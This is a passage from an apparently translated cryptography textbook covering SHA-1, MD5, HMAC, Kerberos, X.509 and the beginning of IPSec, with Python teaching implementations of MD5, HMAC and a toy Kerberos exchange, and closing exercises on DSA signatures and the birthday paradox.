Suppose the length of the message is l bits. Append the bit 1 to the end of the message, followed by k zero bits (k is the smallest non-negative number such that l + 1 + k = 448 (mod 512)). Then append a 64-bit block containing the binary representation of l.

Parsing the expanded message:
After the message has been expanded, it is parsed into N blocks of 512 bits M(1), M(2), …, M(N). The 512 bits of an input block can be expressed as sixteen 32-bit words.

Initialising the hash value:
The hash value is a bit string whose size equals the size of the message digest (except for SHA384), made up of concatenated words. Hj(i) is word j of the hash value at iteration i, with 0 ≤ i ≤ N (the number of blocks obtained after splitting the padded text) and 0 ≤ j ≤ (number of words in the hash value - 1). Before hashing, for each secure hash algorithm, the initial hash value H(0) must be set. The size and number of words in H(0) depend on the size of the message digest.
SHA-1 uses the sequence of constants K(0), …, K(79) with the following values:
    K(t) = 5A827999 ( 0 <= t <= 19)
    K(t) = 6ED9EBA1 (20 <= t <= 39)
    K(t) = 8F1BBCDC (40 <= t <= 59)
    K(t) = CA62C1D6 (60 <= t <= 79)

The SHA-1 hash computation step
SHA-1 is used to hash a message M of length l bits satisfying $0 \le l \le 2^{64}$. The algorithm uses:
- A message schedule of eighty 32-bit words
- Five 32-bit variables
- A hash value of five 32-bit words
The result of SHA-1 is a message digest 160 bits long.
The words of the message schedule are denoted W(0), W(1), …, W(79). The five variables are denoted a, b, c, d, e. The words of the hash value are denoted H0(i), H1(i), H2(i), H3(i), H4(i). H(0) holds the initial hash value and is replaced by each successive hash value H(i) after each message block is processed, ending with the final hash value H(N).

Computing the message digest
Definition: S^n(X) = (X << n) or (X >> 32-n).
X << n means discarding the leftmost n bits and padding the result with n zeros on the right.
X >> n means discarding the rightmost n bits and padding the result with n zeros on the left.
Initialise H:
    H0 = 67452301 ; H1 = EFCDAB89
    H2 = 98BADCFE ; H3 = 10325476
    H4 = C3D2E1F0
For each block M(i):
    Divide M(i) into 16 words W(0), W(1), …, W(15)
    For t = 16 to 79
        W(t) = S^1(W(t-3) XOR W(t-8) XOR W(t-14) XOR W(t-16))
    Set a = H0, b = H1, c = H2, d = H3, e = H4
    For t = 0 to 79 do
        TEMP = S^5(a) + f(t;b,c,d) + e + W(t) + K(t);
        e = d; d = c; c = S^30(b); b = a; a = TEMP;
    Set H0 = H0 + a, H1 = H1 + b, H2 = H2 + c, H3 = H3 + d, H4 = H4 + e
After all blocks up to M(N) have been processed, the message digest is the 160-bit string formed by the 5 words: H0 H1 H2 H3 H4

Evaluation of the algorithm

- SHA-1 is considered secure against collisions, because it is very hard to find two different messages with the same hash value.
- SHA-1 has been regarded as the standard for protecting online communication channels for the past 9 years.
- SHA-1 was designed for 32-bit processors; the coming generation of computers uses 64-bit processors, on which SHA-1 is not efficient.
- In February 2005 SHA-1 was attacked by 3 Chinese experts. The algorithm was broken by means of a distributed computation method.

The MD5 algorithm

Description of the algorithm
The algorithm takes a message of arbitrary length as input and produces a fixed-length output string of 128 bits. It was designed to run on 32-bit machines.

Algorithm: the input message has an arbitrary length of b bits. Write its bits as follows:

    m[0] m[1] m[2] ... m[b-1]

Step 1: Append padding bits. The message is extended by appending bits so that its length (in bits) is congruent to 448 modulo 512. That is, the message is extended until it is 64 bits short of a length divisible by 512. The padding is done as follows: a single "1" bit is appended to the message, and then "0" bits are appended until the length is congruent to 448 modulo 512.

Step 2: Append the length. A 64-bit representation of the length b of the original string is appended to the result of Step 1.

Step 3: Initialise the MD buffer. A four-word buffer (A, B, C, D) is used to compute the message digest. Each of A, B, C, D is a 32-bit register. These registers are initialised to the following hex values:

    A=0x01234567
    B=0x89abcdef
    C=0xfedcba98
    D=0x76543210

Step 4: Process the message in 16-word blocks. Define the auxiliary functions, each of which takes three 32-bit words as input and produces one 32-bit word:

    F(X,Y,Z) = XY v not(X) Z
    G(X,Y,Z) = XZ v Y not(Z)
    H(X,Y,Z) = X xor Y xor Z
    I(X,Y,Z) = Y xor (X v not(Z))

This step uses a table of 64 values T[1 .. 64] built from the sine function. Let T[i] be the i-th element of the table; then T[i] is the integer part of 4294967296*|sin(i)|, with i in radians.

Algorithm

    /* Process each 16-word block */
    For i = 0 to N/16-1 do
      /* Copy block i into X. */
      For j = 0 to 15 do
        Set X[j] to M[i*16+j].
      end
      AA = A
      BB = B
      CC = C
      DD = D

      /* Round 1: [abcd k s i] denotes the operation
         a = b + ((a + F(b,c,d) + X[k] + T[i]) <<< s). */
      /* Do the following 16 operations */
      [ABCD  0  7  1] [DABC  1 12  2] [CDAB  2 17  3] [BCDA  3 22  4]
      [ABCD  4  7  5] [DABC  5 12  6] [CDAB  6 17  7] [BCDA  7 22  8]
      [ABCD  8  7  9] [DABC  9 12 10] [CDAB 10 17 11] [BCDA 11 22 12]
      [ABCD 12  7 13] [DABC 13 12 14] [CDAB 14 17 15] [BCDA 15 22 16]

      /* Round 2: [abcd k s i] denotes the operation
         a = b + ((a + G(b,c,d) + X[k] + T[i]) <<< s). */
      /* Do the following 16 operations */
      [ABCD  1  5 17] [DABC  6  9 18] [CDAB 11 14 19] [BCDA  0 20 20]
      [ABCD  5  5 21] [DABC 10  9 22] [CDAB 15 14 23] [BCDA  4 20 24]
      [ABCD  9  5 25] [DABC 14  9 26] [CDAB  3 14 27] [BCDA  8 20 28]
      [ABCD 13  5 29] [DABC  2  9 30] [CDAB  7 14 31] [BCDA 12 20 32]

      /* Round 3: [abcd k s i] denotes the operation
         a = b + ((a + H(b,c,d) + X[k] + T[i]) <<< s). */
      /* Do the following 16 operations */
      [ABCD  5  4 33] [DABC  8 11 34] [CDAB 11 16 35] [BCDA 14 23 36]
      [ABCD  1  4 37] [DABC  4 11 38] [CDAB  7 16 39] [BCDA 10 23 40]
      [ABCD 13  4 41] [DABC  0 11 42] [CDAB  3 16 43] [BCDA  6 23 44]
      [ABCD  9  4 45] [DABC 12 11 46] [CDAB 15 16 47] [BCDA  2 23 48]

      /* Round 4: [abcd k s i] denotes the operation
         a = b + ((a + I(b,c,d) + X[k] + T[i]) <<< s). */
      /* Do the following 16 operations */
      [ABCD  0  6 49] [DABC  7 10 50] [CDAB 14 15 51] [BCDA  5 21 52]
      [ABCD 12  6 53] [DABC  3 10 54] [CDAB 10 15 55] [BCDA  1 21 56]
      [ABCD  8  6 57] [DABC 15 10 58] [CDAB  6 15 59] [BCDA 13 21 60]
      [ABCD  4  6 61] [DABC 11 10 62] [CDAB  2 15 63] [BCDA  9 21 64]

      /* Then compute */
      A = A + AA
      B = B + BB
      C = C + CC
      D = D + DD
    end /* end of the loop on i */

Step 5: Message digest = A||B||C||D.

Evaluation of the MD5 algorithm
In terms of digest generation speed, MD5 is slower than MD4, but it is far more secure than MD4. The MD5 message digest algorithm is fairly simple to implement and provides a hash value for a message of arbitrary length. It is believed that the difficulty of finding 2 messages with the same hash value is about 2^64 computation steps, and the difficulty of finding a message with a given hash value is 2^128 computation steps.
However, a newly discovered weakness in the MD5 algorithm allows an attacker to create a forged file within a few hours on a standard computer.
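The five steps above, written out as an added Python example (not code from the textbook) and checked against the RFC 1321 test vectors. One detail the step list leaves implicit: the register values of Step 3 are byte sequences written low-order byte first, so as 32-bit integers they are 0x67452301, 0xefcdab89, 0x98badcfe and 0x10325476, and the message words and the appended length are read little-endian in the same way.

```python
import math
import struct

MASK = 0xFFFFFFFF

# Shift amounts s from the [abcd k s i] tables of Step 4, in operation order.
SHIFTS = ([7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 +
          [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4)

# T[i] = integer part of 4294967296 * |sin(i)|, i in radians, for i = 1..64.
T = [int(4294967296 * abs(math.sin(i))) & MASK for i in range(1, 65)]


def rotl(x, s):
    """32-bit left rotation (the <<< operator of the pseudocode)."""
    x &= MASK
    return ((x << s) | (x >> (32 - s))) & MASK


def md5_pad(message: bytes) -> bytes:
    """Steps 1 and 2: a '1' bit, '0' bits up to 448 mod 512, then 64-bit length."""
    bit_len = (len(message) * 8) & 0xFFFFFFFFFFFFFFFF
    padded = message + b"\x80"                          # the single '1' bit
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)  # 56 bytes = 448 bits
    return padded + struct.pack("<Q", bit_len)          # length, low-order first


def md5(message: bytes) -> str:
    # Step 3: registers A, B, C, D as little-endian 32-bit integers.
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    data = md5_pad(message)
    # Step 4: one iteration per 16-word (512-bit) block.
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(64):
            if i < 16:                       # round 1, function F
                f, k = (b & c) | (~b & d), i
            elif i < 32:                     # round 2, function G
                f, k = (b & d) | (c & ~d), (5 * i + 1) % 16
            elif i < 48:                     # round 3, function H
                f, k = b ^ c ^ d, (3 * i + 5) % 16
            else:                            # round 4, function I
                f, k = c ^ (b | ~d), (7 * i) % 16
            total = (a + f + X[k] + T[i]) & MASK
            # a = b + (total <<< s), then the four registers rotate roles.
            a, d, c, b = d, c, b, (b + rotl(total, SHIFTS[i])) & MASK
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    # Step 5: digest = A || B || C || D, each word low-order byte first.
    return struct.pack("<4I", A, B, C, D).hex()


if __name__ == "__main__":
    for sample in (b"", b"abc", b"message digest"):
        print(sample, md5(sample))
```
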

The enhanced secure hash standard
The National Institute of Standards and Technology (NIST) published the revision FIPS 180-2 in 2002, proposing 3 new versions of SHA: SHA-256, SHA-384 and SHA-512. These versions are designed to be compatible with the increased security provided by the Advanced Encryption Standard (AES). Their structure and details resemble SHA-1, so their analysis is similar, but their security level is much higher than that of SHA-1.

[Figure: SHA-512 overview]

The SHA-512 compression function
This is the heart of the algorithm. It processes the message in 1024-bit blocks and consists of 80 rounds:
o updating a 512-bit buffer
o using a 64-bit value Wt derived from the current block of the message
o and a round constant based on the cube roots of the first 80 prime numbers

[Figure: the SHA-512 round function]

VI.3.3 The Whirlpool hash function
We now look at the Whirlpool hash function, which has been endorsed by the European NESSIE project. It uses the internal transformations of the Advanced Encryption Standard (AES) as its compression function, returning to the earlier approach of building on a block cipher. The performance of Whirlpool is comparable to well-known algorithms such as SHA. An overview of Whirlpool is shown in the following figure.

[Figure: Whirlpool overview]

The Whirlpool block cipher
Whirlpool's cipher was designed specifically for use in a hash function, with security and efficiency like those of AES, but with a 512-bit block size for the hash. Its functions and structure are similar to AES, but the input is mapped neatly into 10 rows and it uses different primitive polynomials over GF(2^8). It also uses different S-box values and a different S-box design.

Security and performance of Whirlpool
Whirlpool was proposed only recently, so there is little experience with its use. However, it is built on AES techniques that have been used widely. Whirlpool may need more hardware than SHA, but its performance will be better.

VI.3.4 Keyed hash functions as MACs
Once good hash functions are available, we want message authentication codes (MACs) built on them. Because hash functions are generally faster and their source code is more widely available, using them to build a MAC is more efficient. A MAC can be viewed as a hash that covers the key together with the message, and the following was originally proposed:

    KeyedHash = Hash(Key | Message)

Some weaknesses were found in this construction. To overcome them, a scheme that combines hashing to build a MAC was developed: HMAC.

VI.3.5 HMAC
HMAC is specified in Internet standard RFC 2104 and applies the hash function to the message as follows:

    HMAC_K = Hash[(K+ XOR opad) || Hash[(K+ XOR ipad) || M]]

where K+ is the key K padded out to the block size, opad and ipad are special padding constants, and M is the message. It therefore requires 3 more hash computations than hashing the message alone. Any hash function can be used in this scheme: MD5, SHA-1, RIPEMD-160 or Whirlpool.

[Figure: HMAC overview]
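The HMAC formula above, computed term by term as an added Python example (not code from the textbook) and compared with the standard library's hmac module. The constants ipad = 0x36 and opad = 0x5c repeated to the block size come from RFC 2104; naive_keyed_hash is a name chosen here for the KeyedHash construction of VI.3.4, and the key/message boundary ambiguity it shows is one easily checked weakness, not necessarily the one the text has in mind.

```python
import hashlib
import hmac


def hmac_manual(key: bytes, message: bytes, hash_name: str = "sha1") -> bytes:
    """Hash[(K+ XOR opad) || Hash[(K+ XOR ipad) || M]] as in RFC 2104."""
    def h(data: bytes) -> bytes:
        return hashlib.new(hash_name, data).digest()

    block_size = hashlib.new(hash_name).block_size   # 64 bytes for MD5/SHA-1
    if len(key) > block_size:
        key = h(key)                                 # long keys are hashed first
    k_plus = key.ljust(block_size, b"\x00")          # K+ : key padded with zeros
    ipad = bytes(b ^ 0x36 for b in k_plus)           # K+ XOR ipad
    opad = bytes(b ^ 0x5C for b in k_plus)           # K+ XOR opad
    return h(opad + h(ipad + message))


def verify_tag(key: bytes, message: bytes, tag: bytes, hash_name: str = "sha1") -> bool:
    """Receiver side: recompute the tag and compare in constant time."""
    return hmac.compare_digest(hmac_manual(key, message, hash_name), tag)


def naive_keyed_hash(key: bytes, message: bytes) -> bytes:
    """KeyedHash = Hash(Key | Message): nothing marks where the key ends."""
    return hashlib.sha1(key + message).digest()


if __name__ == "__main__":
    key, msg = b"Jefe", b"what do ya want for nothing?"   # RFC 2202 test case 2
    tag = hmac_manual(key, msg)
    print("HMAC-SHA1:", tag.hex())
    print("matches hmac module:", tag == hmac.new(key, msg, hashlib.sha1).digest())
    print("accepts original:", verify_tag(key, msg, tag))
    print("accepts altered :", verify_tag(key, msg + b"!", tag))
    # Two different (key, message) pairs collide under the naive construction,
    # while HMAC separates them because the key is padded to a full block.
    print("naive collides:", naive_keyed_hash(b"ab", b"c") == naive_keyed_hash(b"a", b"bc"))
    print("HMAC collides :", hmac_manual(b"ab", b"c") == hmac_manual(b"a", b"bc"))
```
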

Security of HMAC
The security of HMAC has been proved to relate to that of the underlying hash algorithm in the scheme above. Attacking HMAC requires either:
o a brute-force attack on the key used, or
o a birthday attack (which, however, requires observing a very large number of messages)
The hash function to use can be chosen based on speed and security constraints.

VI.3.6 CMAC
Earlier we looked at the Data Authentication Algorithm DAA (CBC-MAC), which is widely used in government and industry. However, the size of its MAC is limited to at most 64 bits. This drawback can be overcome by using 2 keys and padding; the method is called the Cipher-based Message Authentication Code (CMAC) and is proposed in NIST SP800-38B.

[Figure: CMAC overview]

VI.4 Authentication applications
We will look at authentication functions developed to support application-level authentication and digital signatures. We also look at the private-key authentication service Kerberos, and then at the public-key authentication service X.509.

VI.4.1 Kerberos
This is the trusted key server system from MIT (Massachusetts Institute of Technology), which provides centralised, private-key, third-party authentication. It allows users to access distributed services across a network. There is no need to trust every workstation; instead only the central authentication server needs to be trusted. Two versions are in use: Kerberos 4 and Kerberos 5.

1. Kerberos requirements
The first report on Kerberos listed the following requirements:
o Secure
o Reliable
o Transparent
o Scalable
It is implemented using the Needham-Schroeder authentication protocol.

2. Kerberos 4 overview
It is a basic third-party authentication scheme with an authentication server (AS). Users negotiate their identity with the AS, and the AS provides a trusted authentication credential through the ticket granting ticket (TGT) and the ticket granting server (TGS). Users subsequently request access to other services from the TGS on the basis of their TGT.

3. The Kerberos 4 exchange
The user obtains a ticket from the authentication server AS, one per working session, and also obtains service granting tickets on the basis of the TGT. A separate ticket is used for each different service requested, through an exchange between server and workstation to obtain the service.

4. Kerberos realms
A Kerberos environment consists of a Kerberos server, a number of workstations registered with the server, and application servers that share keys with the server. Such a system is called a Kerberos realm. It is typically a single administrative domain. If there are multiple realms, their Kerberos servers must share keys and trust each other.

5. Kerberos version 5
Kerberos 5 was developed in the mid 1990s and is specified in RFC 1510. It provides improvements over version 4, specifically addressing shortcomings in environment, encryption algorithms, network protocols, byte order, ticket lifetime, authentication forwarding and inter-realm authentication, as well as technical differences such as double encryption, non-standard modes of use, session keys and protection against password attacks.

We now look at the Kerberos model in detail.
Kerberos is a network authentication protocol. It allows individuals to communicate over an insecure network by authenticating one user to another through a confidential and secure mechanism. Kerberos prevents eavesdropping and replay attacks and ensures the integrity of data. Kerberos follows the client/server model and performs two-way authentication: the user and the service authenticate each other. Kerberos is built on symmetric-key cryptography and requires a trusted third party to take part in the authentication process.

Protocol description
Kerberos uses a trusted third party to perform authentication, called the Key Distribution Center, which consists of 2 separate parts: an authentication server (AS) and a ticket granting server (TGS). Kerberos works with tickets to authenticate users.
Kerberos maintains a database of secret keys. Every entity on the network (workstation or server) shares a secret key known only to itself and Kerberos. For communication between 2 entities, Kerberos generates a session key, which is used to secure the interaction between them.

How Kerberos works
The operation of the protocol (AS = authentication server, TGS = ticket granting server, C = client workstation, S = service):
1. The user enters a user name and password on the client.
2. The client applies a one-way hash to the entered password, and the result becomes the client's secret key.
3. The client sends a cleartext message to the AS requesting service. Neither the secret key nor the password is sent to the AS.
4. The AS checks whether user C exists in its database. If so, it sends 2 messages back to the client:
   o Message A: contains the client/TGS session key, encrypted with the user's secret key.
   o Message B: contains the ticket (comprising the client ID, the client's network address, the ticket validity period and a client/TGS session key), encrypted with the TGS's secret key.
5. When the client receives messages A and B, it decrypts message A to obtain the client/TGS session key. This session key is used for the subsequent exchange with the TGS. The client cannot decrypt message B, because it is encrypted with the TGS's secret key.
6. When requesting a service (S), the client sends the following 2 messages to the TGS:
   o Message C: consists of message B and the ID of the requested service.
   o Message D: contains an Authenticator (comprising the client ID and a timestamp), encrypted with the client/TGS session key.
7. On receiving messages C and D, the TGS decrypts message D using the client/TGS session key and sends 2 messages back to the client:
   o Message E: contains the client-to-server ticket (comprising the client ID, the client's network address, the ticket validity period and a client/service session key), encrypted with the service's secret key.
   o Message F: contains the client/server session key, encrypted with the client/TGS session key.
8. On receiving messages E and F, the client sends a new Authenticator and the client-to-server ticket to the server hosting the requested service:
   o Message G: contains the client-to-server ticket, encrypted with the server's secret key.
   o Message H: a new Authenticator containing the client ID and a timestamp, encrypted with the client/server session key.
9. The server then decrypts the ticket using its own secret key and sends the client a message confirming that the client is genuinely valid and that it is ready to provide service to the client:
   o Message I: contains the timestamp value from the Authenticator sent by the client, incremented by 1, encrypted with the client/server session key.
10. The client decrypts this confirmation using the key it shares with the server and checks whether the timestamp has been updated correctly. If so, the client can trust the server and begins issuing service requests to it.
11. The server provides the requested service to the client.
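The exchange of messages A to I, simulated end to end as an added Python example (not code from the textbook or from any Kerberos implementation). Assumptions made here: seal/unseal is a toy authenticated cipher built from SHA-256 and HMAC standing in for the real encryption, the password hash is plain SHA-256, and the lifetime, clock skew, names and address are constructed values.

```python
import hashlib, hmac, json, os

LIFETIME, SKEW = 3600, 300   # assumed ticket lifetime and clock skew (seconds)

def password_key(password: str) -> bytes:
    """Step 2: a one-way hash of the password becomes the client's secret key."""
    return hashlib.sha256(password.encode()).digest()

def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    blocks = (hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
              for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]

def seal(key: bytes, fields: dict) -> bytes:
    """Toy authenticated encryption (teaching stand-in, not a real cipher)."""
    plain = json.dumps(fields).encode()
    nonce = os.urandom(16)
    body = nonce + bytes(p ^ s for p, s in zip(plain, _keystream(key, nonce, len(plain))))
    return body + hmac.new(key, body, hashlib.sha256).digest()

def unseal(key: bytes, blob: bytes) -> dict:
    body, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).digest(), tag):
        raise ValueError("wrong key or modified message")
    nonce, ct = body[:16], body[16:]
    return json.loads(bytes(c ^ s for c, s in zip(ct, _keystream(key, nonce, len(ct)))))

def check(ticket: dict, auth: dict, now: int) -> None:
    """Checks made by TGS and service on a ticket plus its Authenticator."""
    if auth["client"] != ticket["client"]:
        raise ValueError("authenticator does not match ticket")
    if now > ticket["expires"]:
        raise ValueError("ticket expired")
    if abs(now - auth["ts"]) > SKEW:
        raise ValueError("stale authenticator")

class KDC:
    """Key Distribution Center: AS and TGS sharing one key database."""
    def __init__(self, passwords: dict, service_keys: dict):
        self.user_keys = {u: password_key(p) for u, p in passwords.items()}
        self.service_keys = service_keys
        self.tgs_key = os.urandom(32)

    def as_exchange(self, client: str, addr: str, now: int):
        """Steps 3-4: cleartext request in, messages A and B out."""
        user_key = self.user_keys[client]            # KeyError: unknown user
        k_c_tgs = os.urandom(32).hex()
        msg_a = seal(user_key, {"key": k_c_tgs})
        msg_b = seal(self.tgs_key, {"client": client, "addr": addr,
                                    "expires": now + LIFETIME, "key": k_c_tgs})
        return msg_a, msg_b

    def tgs_exchange(self, msg_b: bytes, service: str, msg_d: bytes, now: int):
        """Step 7: message C = (msg_b, service) and D in, messages E and F out."""
        tgt = unseal(self.tgs_key, msg_b)
        k_c_tgs = bytes.fromhex(tgt["key"])
        check(tgt, unseal(k_c_tgs, msg_d), now)
        k_c_s = os.urandom(32).hex()
        msg_e = seal(self.service_keys[service],
                     {"client": tgt["client"], "addr": tgt["addr"],
                      "expires": now + LIFETIME, "key": k_c_s})
        return msg_e, seal(k_c_tgs, {"key": k_c_s})

def service_accept(service_key: bytes, msg_g: bytes, msg_h: bytes, now: int) -> bytes:
    """Step 9: the service opens the ticket, checks H, answers with message I."""
    ticket = unseal(service_key, msg_g)
    k_c_s = bytes.fromhex(ticket["key"])
    auth = unseal(k_c_s, msg_h)
    check(ticket, auth, now)
    return seal(k_c_s, {"ts": auth["ts"] + 1})

def client_session(kdc, service_key, user, password, service, now) -> bool:
    """Steps 1-10 from the client's side; True if the server proved itself."""
    msg_a, msg_b = kdc.as_exchange(user, "10.0.0.5", now)
    k_c_tgs = bytes.fromhex(unseal(password_key(password), msg_a)["key"])  # step 5
    msg_d = seal(k_c_tgs, {"client": user, "ts": now})                     # step 6
    msg_e, msg_f = kdc.tgs_exchange(msg_b, service, msg_d, now)
    k_c_s = bytes.fromhex(unseal(k_c_tgs, msg_f)["key"])                   # step 8
    msg_h = seal(k_c_s, {"client": user, "ts": now})
    msg_i = service_accept(service_key, msg_e, msg_h, now)  # G is E, forwarded
    return unseal(k_c_s, msg_i)["ts"] == now + 1                           # step 10

if __name__ == "__main__":
    files_key = os.urandom(32)
    kdc = KDC({"alice": "correct horse"}, {"files": files_key})
    print("login ok:", client_session(kdc, files_key, "alice", "correct horse", "files", 1000))
    try:
        client_session(kdc, files_key, "alice", "guess", "files", 1000)
    except ValueError as err:
        print("wrong password:", err)
```

The password never crosses the network: a wrong password only shows up as the client's failure to open message A, which is also why the dictionary attack discussed under the limitations of Kerberos works offline against a captured message A.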
Limitations of Kerberos
Kerberos is well suited to providing authentication, authorisation and confidentiality of exchanged information within one network or a small set of networks. However, it is not well suited to some other functions, such as digital signing (which must satisfy both authentication and non-repudiation). One of the important assumptions of the Kerberos protocol is that the servers on the network must be trustworthy. In addition, if users choose easily guessed passwords, the system is vulnerable to dictionary attacks, in which the attacker simply tries many different passwords until the correct value is found. Because the system relies entirely on passwords to authenticate users, if the passwords themselves are stolen the scope for attacking the system is unlimited. This leads to a very basic requirement: the Key Distribution Center must be strictly protected. Otherwise the whole system becomes insecure.

Data integrity
Data integrity is an indispensable requirement for every security system. To ensure real data integrity, cryptographic techniques such as hashing, message authentication codes (MACs) and digital signatures can be deployed together. Fundamentally, these measures use one-way functions, meaning that the data cannot be decrypted even when the key used to encrypt it is known.

VI.4.2 The X.509 authentication service
The X.509 authentication service is part of the CCITT X.500 directory service standard. Here distributed servers maintain a database of information about users, and a framework for authentication services is defined. The directory contains public-key certificates: the user's public key signed by a certification authority. For uniformity the service also defines authentication protocols that use public-key cryptography and digital signatures. The algorithms are not standardised, but RSA is recommended. X.509 certificates are widely used.

1. X.509 certificates
A certificate is issued by a Certification Authority (CA) and contains:
o Version 1, 2 or 3
o Serial number (unique within the CA) identifying the certificate
o Signature algorithm identifier
o X.500 name of the issuer (the CA)
o Period of validity (from and to dates)
o X.500 name of the subject (name of the owner)
o Subject public-key information (algorithm, parameters, key)
o Issuer unique identifier (version 2+)
o Subject unique identifier (version 2+)
o Extension fields (version 3)
o Signature (or hash of the fields in the certificate)
The notation CA<<A>> denotes the certificate for A signed by CA.

2. Obtaining a certificate
Any user can contact the CA to obtain a certificate. Only the CA can modify a certificate. Because certificates cannot be forged, they can be placed in a public directory.

3. CA hierarchy
If both users share a common CA, they are assumed to know that CA's public key. Otherwise the CAs must form a hierarchy in order to exchange certificates with each other. Certificates linking the members of the hierarchy are used to obtain the certificates of other CAs. Each CA can pass its certificates forward to its clients and backward to its parent. Each client trusts its parent's certificates. Any certificate issued by one CA to a user can be verified through the other CAs in the hierarchy.

4. Certificate revocation
Certificates have a period of validity and may be revoked before expiry when necessary, for example when: the user's private key has been compromised, the user is no longer certified by that CA, or the CA's certificate has been compromised. In general the CA maintains a list of revoked certificates (CRL, Certificate Revocation List). Users can check certificates against the revoked ones.

5. Authentication procedures
X.509 includes three optional authentication procedures: one-way, two-way and three-way authentication. All of them use public-key signatures.

One-way authentication
One message A->B is used to establish:
o the identity of A and that the message is from A
o that the message is intended for B
o the integrity and originality of the message
The message may include a timestamp, a nonce and the identity of B, and it is signed by A. It may include additional information for B, such as a session key.

Two-way authentication
Two messages, A->B and B->A, are exchanged. In addition to the message from A to B as above, this establishes:
o the identity of B and that the reply is from B
o that the reply is intended for A
o the integrity and originality of the reply
The reply includes the nonce from A as well as a timestamp and a nonce from B. It may include additional information for A.

Three-way authentication
Three messages, A->B, B->A and A->B, are exchanged as above without synchronised clocks. In addition to the two messages above there is a reply from A back to B containing a signed copy of the nonce from B's reply, which means the timestamps need not be checked.

X.509 version 3
Version 3 adds some necessary information to the certificate, such as Email/URL, details of the issuing policy and usage constraints. Rather than explicitly naming new fields, a general extension method is defined. An extension consists of:
o Extension identifier
o Criticality indicator
o Extension value

Certificate extensions
Key and policy information
o Covers information about the subject and issuer keys, plus indicators of the certificate policy
Certificate subject and issuer attributes
o Support alternative names, in alternative formats, for subjects and issuers
Certificate path constraints
o Allow constraints on the use of certificates by other CAs

Exercises
1. DSA digital signature: let p = 23, q = 11, h = 3.
   Compute g.
   User A chooses the private key xA = 7; compute A's public key yA.
   Let the hash of M be H(M) = 15.
   Choose the random number k = 6.
   Compute A's digital signature (r, s).
   Explain how the recipient verifies A's digital signature on the message M.
2. DSA digital signature: let p = 53, q = 13, h = 5.
   Compute g.
   User A chooses the private key xA = 11; compute A's public key yA.
   Let the hash of M be H(M) = 17.
   Choose the random number k = 9.
   Compute A's digital signature (r, s).
   Explain how the recipient verifies A's digital signature on the message M.
3. Describe the methods for distributing public keys, and the ways in which two users can publicly exchange a secret key.
4. State the differences between a MAC and a hash and explain what each is used for. Give some examples of MAC and hash functions.
5. Explain what HMAC is and for what purpose it is used.
6. Describe some ways of creating and verifying digital signatures.
7. Prove the Birthday Paradox, that is, with at least 23 people the probability that two of them share a birthday is greater than or equal to 0.5.
8. Which basic arithmetic and logical functions are used in MD5?
9. Which basic arithmetic and logical functions are used in SHA-1?
10. Which basic arithmetic and logical functions are used in RIPEMD-160?
11. Describe the operation of the authentication protocols in the Kerberos model.
12. Describe the X.509 authentication service.

CHAPTER 7: IP AND WEB SECURITY
In this chapter we look at the IPSec security mechanism and at some transport-layer security protocols used on the Web.

VII.1 IP security
There are quite a few application-specific security mechanisms, such as S/MIME, PGP, Kerberos and SSL/HTTPS. However, some security concerns cut across application layers, which is the role of IP security, implemented in the network for all applications.

VII.1.1 IPSec
IPSec is a general IP security mechanism. It provides authentication, confidentiality and key management. IPSec is used on LANs, on private and public WANs and across the Internet.

Benefits of IPSec
IPSec in a firewall/router provides strong security for all traffic crossing the perimeter. It is resistant to bypassing of the firewall/router. IPSec sits beneath the transport layer, so it is transparent to all applications and can be transparent to end users. It can provide security for individual users and protects the routing architecture.

VII.1.2 IP security architecture
The IP security specification is very complex and is defined in a number of standards (RFCs), including RFC 2401/2402/2406/2408, with many others grouped by category. It is mandatory for IPv6 and optional for IPv4. There are two security header extensions:
o Authentication Header (AH)
o Encapsulating Security Payload (ESP)

1. IPSec services
IPSec aims to provide: access control, connectionless integrity, data origin authentication, rejection of replayed packets (a form of partial sequence integrity), confidentiality (encryption) and limited traffic flow confidentiality.

2. Security associations
A security association is a one-way relationship between sender and receiver that provides security for the traffic flow. It is identified by 3 parameters:
o Security Parameters Index
o Destination IP address
o Security protocol identifier
There are a number of other parameters, such as the sequence number, information about the authentication header and the extension header (AH & EH), and the lifetime. A database of security associations is maintained.

3. Authentication Header (AH)
AH provides support for data integrity and authentication of IP packets:
o An end system or switch can authenticate the user or application
o It prevents address spoofing attacks by tracking sequence numbers
AH is based on the use of a MAC: HMAC-MD5-96 or HMAC-SHA-1-96. For this the parties must share a secret key.

4. Encapsulating Security Payload (ESP)
ESP provides confidentiality of message contents and limited traffic flow confidentiality, can optionally provide authentication services, and supports a wide range of ciphers, cipher modes and padding:
o Including DES, Triple DES, RC5, IDEA, CAST, ...
o CBC and other modes
o Padding is needed to fill out the block size and fields, and for traffic flow

5. ESP transport mode and tunnel mode
ESP is used in 2 modes: transport and tunnel. In tunnel mode the destination address need not be kept in the clear.
Transport mode is used to encrypt and optionally authenticate IP data:
o The data is protected but the header is left in the clear so that the destination address is known
o Traffic analysis can be carried out effectively
o Good for ESP host-to-host traffic
Tunnel mode encrypts the entire IP packet:
o A new header is added for the next hop
o Good for virtual private networks (VPNs) and gateway-to-gateway security

6. Combining security associations
Security associations can implement either AH or ESP. To implement both, security associations must be combined:
o Forming a security association bundle
o They may terminate at the same or at different endpoints
o Combined by transport adjacency and iterated tunnelling
The order of authentication and encryption needs to be considered.

7. Key management
Key management handles key generation and key distribution between the communicating parties. Typically 2 pairs of keys are needed, 2 keys per direction, for AH and ESP. In manual key management, the system administrator configures each system by hand. In automated key management:
o The system automatically creates keys on demand for the security associations in a large system
o It has components such as the Oakley key exchange protocol and ISAKMP, the Internet security association protocol

8. Oakley
Oakley is a key exchange protocol based on Diffie-Hellman key exchange. It adds features to address weaknesses: cookies, groups (global parameters), nonces, and Diffie-Hellman key exchange with authentication. It can use arithmetic over prime fields or elliptic curves.

9. ISAKMP
